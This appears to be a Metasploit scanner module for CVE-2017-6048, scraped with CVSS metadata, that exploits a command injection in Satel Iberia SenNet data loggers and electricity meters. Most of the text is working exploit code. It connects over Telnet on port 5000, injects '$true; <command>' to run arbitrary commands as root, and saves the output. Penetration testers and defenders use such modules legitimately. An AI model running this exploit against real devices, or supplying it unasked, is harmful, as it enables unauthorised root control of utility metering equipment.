Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Telnet\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability',\n 'Description' => %q{\n This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters\n to perform arbitrary command execution as 'root'.\n },\n 'References' =>\n [\n [ 'CVE', '2017-6048' ],\n [ 'URL', 'https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/' ],\n [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-131-02' ]\n ],\n 'Author' =>\n [\n 'Karn Ganeshen <KarnGaneshen[at]gmail.com>'\n ],\n 'DisclosureDate' => 'Apr 07, 2017',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'VERBOSE' => true })\n )\n\n register_options(\n [\n Opt::RPORT(5000),\n OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),\n OptString.new('CMD', [true, 'Command(s) to run', 'id'])\n ], self.class\n )\n\n deregister_options('USERNAME', 'PASSWORD')\n end\n\n def run_host(ip)\n to = (datastore['TIMEOUT'].zero?) ? 
30 : datastore['TIMEOUT']\n begin\n ::Timeout.timeout(to) do\n command = datastore['CMD']\n inject = \"$true; #{command}\"\n res = connect\n\n print_status(\"Sending command now - #{command}\")\n\n sock.puts(inject)\n data = sock.get_once(-1, to)\n print_good(\"#{data}\")\n\n loot_name = 'cmd-exec-log'\n loot_type = 'text/plain'\n loot_desc = 'Satel SenNet CMD Exec Dump'\n p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)\n print_good(\"File saved in: #{p}\")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError\n print_error(\"#{rhost}:#{rport} - Connection Failed...\")\n return false\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/telnet/satel_cmd_exec.rb"}]}